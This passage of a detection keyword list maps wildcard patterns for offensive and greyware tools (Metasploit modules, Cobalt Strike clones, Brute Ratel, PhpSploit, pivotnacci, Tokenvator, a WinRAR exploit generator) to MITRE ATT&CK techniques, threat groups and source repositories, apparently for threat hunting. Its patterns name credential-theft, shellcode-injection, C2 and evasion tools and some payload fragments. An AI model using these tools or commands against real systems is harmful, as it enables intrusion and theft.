hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpggc monolog/rce1 assert 'phpinfo()'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpggc symfony/rce1 id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpmyadmin_credsteal.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PhpSploit*,offensive_tool_keyword,PhpSploit,Full-featured C2 framework which silently persists on webserver via evil PHP oneliner,T1059 - T1102 - T1053 - T1216 - T1027,TA0002 - TA0007 - TA0008,N/A,N/A,C2,https://github.com/nil0x42/phpsploit,1,1,N/A,10,10,2024,451,2023-08-23T13:08:08Z,2014-05-21T19:43:03Z -*phra/Pezor/*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*phuip-fpizdam*,offensive_tool_keyword,phuip-fpizdam,This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).,T1190 - T1191 - T1192 - T1210 - T1059,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/neex/phuip-fpizdam,1,1,N/A,N/A,10,1767,261,2019-11-12T18:53:14Z,2019-09-23T21:37:27Z -*piata_ssh_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PIC-Exec*runshellcode.asm*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*PIC-Exec\addresshunter*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*PIC-Get-Privileges*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*-PID * -Assembly * -Arguments *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*ping -n 10 localhost > nul*,greyware_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*pingcastle*,offensive_tool_keyword,pingcastle,active directory weakness scan,T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.pingcastle.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PingCastle.cs*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,0,N/A,N/A,,N/A,,, -*PingCastle.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*ping-sweep*,offensive_tool_keyword,ping-sweep,Wrapper around the ping utility included by the OS. used for recon actiivities,T1016 - T1046,TA0007,N/A,N/A,Information Gathering,https://github.com/libresec/ping-sweep,1,0,N/A,N/A,1,1,0,2016-08-22T15:16:01Z,2016-08-22T02:07:46Z -*PinoyWH1Z/AoratosWin*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*PinoyWH1Z/AoratosWin*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*pip install exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pip install rarce*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*pip install --user fee,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*pip* install updog*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*pip3 install bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*pip3 install -U pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*'pipename_stager'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*PipeViewer.csproj*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*PipeViewer_v1.1.zip*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*PipeViewer-main*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*pipx install fee,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*Pitty Tiger RAT*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*pivot_smb \*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pivot_winrm *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pivotnacci http*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci -*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci *--polling-interval*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci/0.0.1*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci-master*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivots/named-pipe_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*-pk8gege.org*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,0,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*pkexec64.tar.gz*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*pkt_comm/word_gen.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pkt_comm/word_list*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pktmon start*,greyware_tool_keyword,pktmon,pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*plex_unpickle_dict_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*plpmggfglncceinmilojdkiijhmajkjh*,greyware_tool_keyword,Red Panda VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*plug_getpass_nps.dll*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plug_katz_nps.exe*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plug_qvte_nps.exe*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plugins.nessus.org.*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Plugins\AccessTokens\TokenDriver*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\AccessTokens\TokenManipulation*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\Execution\PSExec*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege 